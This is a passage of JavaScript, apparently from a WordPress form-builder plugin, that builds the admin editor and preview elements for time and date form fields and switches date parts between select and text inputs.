	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_time');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_time");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
		
		var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("class", "fm-editable-label");
			
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

		div_for_editable_labels.appendChild(edit_labels);  	

		
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_time = document.createElement('div');
           	table_time.setAttribute("id", i+"_table_time");
			table_time.style.display="table";
			
      	var tr_time1 = document.createElement('div');
           	tr_time1.setAttribute("id", i+"_tr_time1");
			tr_time1.style.display="table-row";
			
      	var tr_time2 = document.createElement('div');
           	tr_time2.setAttribute("id", i+"_tr_time2");
			tr_time2.style.display="table-row";
			
      	var td_time_input1 = document.createElement('div');
           	td_time_input1.setAttribute("id", i+"_td_time_input1");
	        td_time_input1.style.cssText ="width:32px";
			td_time_input1.style.display="table-cell";
		
      	var td_time_input1_ket = document.createElement('div');
           	td_time_input1_ket.setAttribute("align", "center");
			td_time_input1_ket.style.display="table-cell";
		

      	var td_time_input2 = document.createElement('div');
           	td_time_input2.setAttribute("id", i+"_td_time_input2");
 	        td_time_input2.style.cssText ="width:32px";
			td_time_input2.style.display="table-cell";
			
     	var td_time_input2_ket = document.createElement('div');
           	td_time_input2_ket.setAttribute("align", "center");
			td_time_input2_ket.style.display="table-cell";
		
      	var td_time_input3 = document.createElement('div');
           	td_time_input3.setAttribute("id", i+"_td_time_input3");
 	        td_time_input3.style.cssText ="width:32px";
			td_time_input3.style.display="table-cell";

      	var td_time_label1 = document.createElement('div');
           	td_time_label1.setAttribute("id", i+"_td_time_label1");
			td_time_label1.style.display="table-cell";
			
      	var td_time_label1_ket = document.createElement('div');
			td_time_label1_ket.style.display="table-cell";
      	var td_time_label2 = document.createElement('div');
           	td_time_label2.setAttribute("id", i+"_td_time_label2");
			td_time_label2.style.display="table-cell";
      	var td_time_label2_ket = document.createElement('div');
			td_time_label2_ket.style.display="table-cell";
      	var td_time_label3 = document.createElement('div');
           	td_time_label3.setAttribute("id", i+"_td_time_label3");
			td_time_label3.style.display="table-cell";
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
			
	var hh = document.createElement('input');
	hh.setAttribute("type", 'text');
	hh.setAttribute("value", w_hh);
	    hh.setAttribute("class", "time_box");
	    hh.setAttribute("id", i+"_hhform_id_temp");
	    hh.setAttribute("name", i+"_hhform_id_temp");
	    hh.setAttribute("onKeyPress", "return check_hour(event, '"+i+"_hhform_id_temp', '23')");
	    hh.setAttribute("onKeyUp", "change_hour(event, '"+i+"_hhform_id_temp','23')");
	    hh.setAttribute("onBlur", "add_0('"+i+"_hhform_id_temp')");
			
	var hh_label = document.createElement('label');
	    hh_label.setAttribute("class", "mini_label");
	    hh_label.setAttribute("id", i+"_mini_label_hh");
	    hh_label.innerHTML=w_mini_labels[0];
			
	var hh_ = document.createElement('span');
        hh_.setAttribute("class", 'wdform_colon');
	    hh_.style.cssText = "font-style:bold; vertical-align:middle";
	    hh_.innerHTML="&nbsp;:&nbsp;";
		
	var mm = document.createElement('input');
        mm.setAttribute("type", 'text');
		mm.setAttribute("value", w_mm);
		mm.setAttribute("class", "time_box");
		
		mm.setAttribute("id", i+"_mmform_id_temp");
	    	mm.setAttribute("name", i+"_mmform_id_temp");
		mm.setAttribute("onKeyPress", "return check_minute(event, '"+i+"_mmform_id_temp')");
	        mm.setAttribute("onKeyUp", "change_minute(event, '"+i+"_mmform_id_temp')");
		mm.setAttribute("onBlur", "add_0('"+i+"_mmform_id_temp')");
		
	var mm_label = document.createElement('label');
		mm_label.setAttribute("class", "mini_label");
		mm_label.setAttribute("id", i+"_mini_label_mm");
		mm_label.innerHTML=w_mini_labels[1];
			
	var mm_ = document.createElement('span');
		mm_.style.cssText = "font-style:bold; vertical-align:middle";
		mm_.innerHTML="&nbsp;:&nbsp;";
        mm_.setAttribute("class", 'wdform_colon');
		
	var ss = document.createElement('input');
           	ss.setAttribute("type", 'text');
		ss.setAttribute("value", w_ss);
		ss.setAttribute("class", "time_box");
		
		ss.setAttribute("id", i+"_ssform_id_temp");
		ss.setAttribute("name", i+"_ssform_id_temp");
		ss.setAttribute("onKeyPress", "return check_second(event, '"+i+"_ssform_id_temp')");
		ss.setAttribute("onKeyUp", "change_second(event, '"+i+"_ssform_id_temp')");
		ss.setAttribute("onBlur", "add_0('"+i+"_ssform_id_temp')");

	var ss_label = document.createElement('label');
		ss_label.setAttribute("class", "mini_label");
		ss_label.setAttribute("id", i+"_mini_label_ss");
		ss_label.innerHTML=w_mini_labels[2];
			
      	var main_td  = document.getElementById('show_table');
	
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
		
      	td_time_input1.appendChild(hh);
      	td_time_input1_ket.appendChild(hh_);
      	td_time_input2.appendChild(mm);
      	td_time_input2_ket.appendChild(mm_);
      	td_time_input3.appendChild(ss);
      	tr_time1.appendChild(td_time_input1);
      	tr_time1.appendChild(td_time_input1_ket);
      	tr_time1.appendChild(td_time_input2);
      	tr_time1.appendChild(td_time_input2_ket);
      	tr_time1.appendChild(td_time_input3);
		
      	td_time_label1.appendChild(hh_label);
      	td_time_label2.appendChild(mm_label);
      	td_time_label3.appendChild(ss_label);
      	tr_time2.appendChild(td_time_label1);
      	tr_time2.appendChild(td_time_label1_ket);
      	tr_time2.appendChild(td_time_label2);
      	tr_time2.appendChild(td_time_label2_ket);
      	tr_time2.appendChild(td_time_label3);
      	table_time.appendChild(tr_time1);
      	table_time.appendChild(tr_time2);
		
        div_element.appendChild(adding_type);
	
        div_element.appendChild(adding_required);
	div_element.appendChild(table_time);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      
      
      	div.appendChild(div_field);
      	div.appendChild(br3);
		div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);

	if(w_field_label_pos=="top")
				label_top(i);
	if(w_time_type=="12")
				format_12(i, w_am_pm,w_hh, w_mm,w_ss);

	if(w_sec=="0")
				second_no(i);
change_class(w_class, i);
refresh_attr(i, 'type_time');

jQuery(document).ready(function() {	
	jQuery("label#"+i+"_mini_label_hh").click(function() {		
		if (jQuery(this).children('input').length == 0) {				
			var hh = "<input type='text' class='hh' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(hh);							
				jQuery("input.hh").focus();			
				jQuery("input.hh").blur(function() {	
			var value = jQuery(this).val();			


		jQuery("#"+i+"_mini_label_hh").text(value);		
		});	
	}	
	});		


	jQuery("label#"+i+"_mini_label_mm").click(function() {	
	if (jQuery(this).children('input').length == 0) {		
		var mm = "<input type='text' class='mm' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
			jQuery(this).html(mm);			
			jQuery("input.mm").focus();					
			jQuery("input.mm").blur(function() {			
			var value = jQuery(this).val();			
			
			jQuery("#"+i+"_mini_label_mm").text(value);	
		});	
	}	
	});
	
		jQuery("label#"+i+"_mini_label_ss").click(function() {	
	if (jQuery(this).children('input').length == 0) {		
		var ss = "<input type='text' class='ss' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
			jQuery(this).html(ss);			
			jQuery("input.ss").focus();					
			jQuery("input.ss").blur(function() {			
			var value = jQuery(this).val();			
			
			jQuery("#"+i+"_mini_label_ss").text(value);	
		});	
	}	
	});
	
	});


}

function type_date(i, w_field_label, w_field_label_size, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value,w_disable_past_days) { 

	document.getElementById("element_type").value="type_date";
	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
			
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
		edit_main_tr4.style.cssText = "display:none;";
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
      				
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");

	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_format_label = document.createElement('label');
		el_format_label.setAttribute("class", "fm-field-label");
		el_format_label.setAttribute("for", "date_format");
		el_format_label.innerHTML = "Date format";
	
	var el_format_textarea = document.createElement('input');
		el_format_textarea.setAttribute("id", "date_format");
		el_format_textarea.setAttribute("type", "text");
		el_format_textarea.setAttribute("value", w_format);
		el_format_textarea.setAttribute("onChange", "change_date_format(this.value,'"+i+"', 'format')");

	var el_button_value_label = document.createElement('label');
		el_button_value_label.setAttribute("class", "fm-field-label");
		el_button_value_label.setAttribute("for", "button_value");
		el_button_value_label.innerHTML = "Date Picker label";
	
	var el_button_value_textarea = document.createElement('input');
		el_button_value_textarea.setAttribute("id", "button_value");
		el_button_value_textarea.setAttribute("type", "text");
		el_button_value_textarea.setAttribute("value", w_but_val);
		el_button_value_textarea.style.cssText = "width:150px;";
		el_button_value_textarea.setAttribute("onKeyUp", "change_file_value(this.value,'"+i+"_buttonform_id_temp')");

	var el_disable_past_days_label = document.createElement('label');
		el_disable_past_days_label.setAttribute("class", "fm-field-label");
		el_disable_past_days_label.setAttribute("for", "el_disable_past_days");
		el_disable_past_days_label.innerHTML = "Allow selecting dates starting from current day";
	
	var el_disable_past_days = document.createElement('input');
		el_disable_past_days.setAttribute("id", "el_disable_past_days");
		el_disable_past_days.setAttribute("type", "checkbox");
        el_disable_past_days.setAttribute("onclick", "change_date_format(this.checked, '"+i+"', 'dis_days')");
		if(w_disable_past_days == "yes")
            el_disable_past_days.setAttribute("checked", "checked");
		
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required == "yes")
			el_required.setAttribute("checked", "checked");
		
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_date')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_date')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_date')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
		el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_date')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);

edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);

	edit_main_td3.appendChild(el_format_label);
	edit_main_td3_1.appendChild(el_format_textarea);
	
	edit_main_td4.appendChild(el_button_value_label);
	edit_main_td4_1.appendChild(el_button_value_textarea);
	
	edit_main_td9.appendChild(el_disable_past_days_label);
	edit_main_td9_1.appendChild(el_disable_past_days);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br1);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_date");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
	var adding_dis_past_days = document.createElement('input');
		adding_dis_past_days.setAttribute("type", 'hidden');
		adding_dis_past_days.setAttribute("value", w_disable_past_days);
		adding_dis_past_days.setAttribute("id", i+"_dis_past_daysform_id_temp");
		adding_dis_past_days.setAttribute("name", i+"_dis_past_daysform_id_temp");
			
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var table_date = document.createElement('div');
		table_date.setAttribute("id", i+"_table_date");
		table_date.style.display="table";
		
	var tr_date1 = document.createElement('div');
		tr_date1.setAttribute("id", i+"_tr_date1");
		tr_date1.style.display="table-row";
		
	var tr_date2 = document.createElement('div');
		tr_date2.setAttribute("id", i+"_tr_date2");
		tr_date2.style.display="table-row";
		
	var td_date_input1 = document.createElement('div');
		td_date_input1.setAttribute("id", i+"_td_date_input1");
		td_date_input1.style.display="table-cell";
			
	var td_date_input2 = document.createElement('div');
		td_date_input2.setAttribute("id", i+"_td_date_input2");
		td_date_input2.style.display="table-cell";
		
	var td_date_input3 = document.createElement('div');
		td_date_input3.setAttribute("id", i+"_td_date_input3");
		td_date_input3.style.display="table-cell";

	var td_date_label1 = document.createElement('div');
		td_date_label1.setAttribute("id", i+"_td_date_label1");
		td_date_label1.style.display="table-cell";
			
	var td_date_label2 = document.createElement('div');
		td_date_label2.setAttribute("id", i+"_td_date_label2");
		td_date_label2.style.display="table-cell";
		
	var td_date_label3 = document.createElement('div');
		td_date_label3.setAttribute("id", i+"_td_date_label3");
		td_date_label3.style.display="table-cell";
		
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
      

    var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
		
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		required.style.verticalAlign="top";
		if(w_required=="yes")
			required.innerHTML = " *";
			
	var adding = document.createElement('input');
		adding.setAttribute("type", 'text');
		adding.setAttribute("value", w_date);
		adding.setAttribute("class", 'wdform-date');
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("name", i+"_elementform_id_temp");
		adding.setAttribute("maxlength", "10");
		adding.setAttribute("size", "10");
		adding.setAttribute("onChange", "change_value('"+i+"_elementform_id_temp')");
	
	var dis_past_days = w_disable_past_days == 'yes' ? true : false;
	
	var adding_button = document.createElement('input');
		adding_button.setAttribute("id", i+"_buttonform_id_temp");
		adding_button.setAttribute("class", "button");
		adding_button.setAttribute("type", 'reset');
		adding_button.setAttribute("value", w_but_val);
		adding_button.setAttribute("format", w_format);
        adding_button.setAttribute("onclick", "return showCalendar('"+i+"_elementform_id_temp' ,'"+w_format+"', "+dis_past_days+")");
			
	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_dis_past_days);
	div_element.appendChild(adding);
	div_element.appendChild(adding_button);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);

	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_date');
}

function field_to_select(id, type)
{

	switch(type)
	{
		case 'day': 
		{
			w_width=document.getElementById('edit_for_day_size').value!=''?document.getElementById('edit_for_day_size').value:30;
			w_day=document.getElementById(id+"_dayform_id_temp").value;
			document.getElementById(id+"_td_date_input1").innerHTML='';	
			
			var select_day  = document.createElement('select');
				select_day.setAttribute("id", id+'_dayform_id_temp');
				select_day.setAttribute("name", id+'_dayform_id_temp');
				select_day.setAttribute("onChange", 'set_select(this)');
				select_day.style.width=w_width+'px';
				
			var options  = document.createElement('option');
				options.setAttribute("value",'');
				options.innerHTML= '';
				select_day.appendChild(options);
				
			for(k=1; k<=31;k++)
			{
				if(k<10)
					k='0'+k;
				var options  = document.createElement('option');
					options.setAttribute("value", k);
					options.innerHTML= k;
				 if (k==w_day) 
					options.setAttribute("selected", "selected");

					select_day.appendChild(options);
					
			}

			document.getElementById(id+"_td_date_input1").appendChild(select_day);

			break;	
		}
		case 'month': 
		{ 
			w_width=document.getElementById('edit_for_month_size').value!=''?document.getElementById('edit_for_month_size').value:60;
			w_month=document.getElementById(id+"_monthform_id_temp").value;
			
			document.getElementById(id+"_td_date_input2").innerHTML='';
			
		var select_month = document.createElement('select');
				select_month.setAttribute("id", id+'_monthform_id_temp');
				select_month.setAttribute("name", id+'_monthform_id_temp');
				select_month.setAttribute("onChange", 'set_select(this)');
				select_month.style.width=w_width+'px';
				
		var options  = document.createElement('option');
				options.setAttribute("value",'');
				options.innerHTML= '';
				select_month.appendChild(options);
				
		var myMonths=new Array("<!--repstart-->January<!--repend-->","<!--repstart-->February<!--repend-->","<!--repstart-->March<!--repend-->","<!--repstart-->April<!--repend-->","<!--repstart-->May<!--repend-->","<!--repstart-->June<!--repend-->","<!--repstart-->July<!--repend-->","<!--repstart-->August<!--repend-->","<!--repstart-->September<!--repend-->","<!--repstart-->October<!--repend-->","<!--repstart-->November<!--repend-->","<!--repstart-->December<!--repend-->");
			for(k=1; k<=12;k++)
			{
				if(k<10)
					k='0'+k;
				var options  = document.createElement('option');
					options.setAttribute("value", k);
					options.innerHTML= myMonths[k-1];
				if (k==w_month) 
					options.setAttribute("selected", "selected");

					select_month.appendChild(options);
					
			}
			document.getElementById(id+"_td_date_input2").appendChild(select_month);
		break;	
		}	
		case 'year':
		{ 
			w_width=document.getElementById('edit_for_year_size').value!=''?document.getElementById('edit_for_year_size').value:60;
			w_year=document.getElementById(id+"_yearform_id_temp").value;
			
		document.getElementById(id+"_td_date_input3").innerHTML=''; 
		var select_year  = document.createElement('select');
			select_year.setAttribute("id", id+'_yearform_id_temp');
			select_year.setAttribute("name", id+'_yearform_id_temp');
			select_year.setAttribute("onChange", 'set_select(this)');
			select_year.style.width=w_width+'px';
			
		var options  = document.createElement('option');
			options.setAttribute("value",'');
			options.innerHTML= '';
			select_year.appendChild(options);
			
		from= parseInt(document.getElementById("edit_for_year_interval_from").value);
		to= parseInt(document.getElementById("edit_for_year_interval_to").value);
		for(k=to; k>=from;k--)
		{
		var options  = document.createElement('option');
			options.setAttribute("value", k);
			options.innerHTML= k;
		if (k==w_year) 
			options.setAttribute("selected", "selected");
			
			select_year.appendChild(options);
		}
		select_year.value=w_year;
		select_year.setAttribute('from',from);
		select_year.setAttribute('to',to);
		document.getElementById(id+"_td_date_input3").appendChild(select_year);
		
		break;
		}
	}
	
refresh_attr(id, 'type_date_fields');

}

function field_to_text(id, type)
{

	switch(type)
	{
		case 'day': 
		{	
			w_width=document.getElementById('edit_for_day_size').value!=''?document.getElementById('edit_for_day_size').value:30;
			w_day=document.getElementById(id+"_dayform_id_temp").value;
			document.getElementById(id+"_td_date_input1").innerHTML='';	

			var day = document.createElement('input');
			day.setAttribute("type", 'text');
			day.setAttribute("value", w_day);
			//day.setAttribute("class", "time_box");
			day.setAttribute("id", id+"_dayform_id_temp");
			day.setAttribute("name", id+"_dayform_id_temp");
			day.setAttribute("onChange", "change_value('"+ id+"_dayform_id_temp')");
			day.setAttribute("onKeyPress", "return check_day(event, '"+id+"_dayform_id_temp')");
		    day.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+id+"_dayform_id_temp')");
		
			day.style.width=w_width+'px';

			document.getElementById(id+"_td_date_input1").appendChild(day);
			break;	
		}
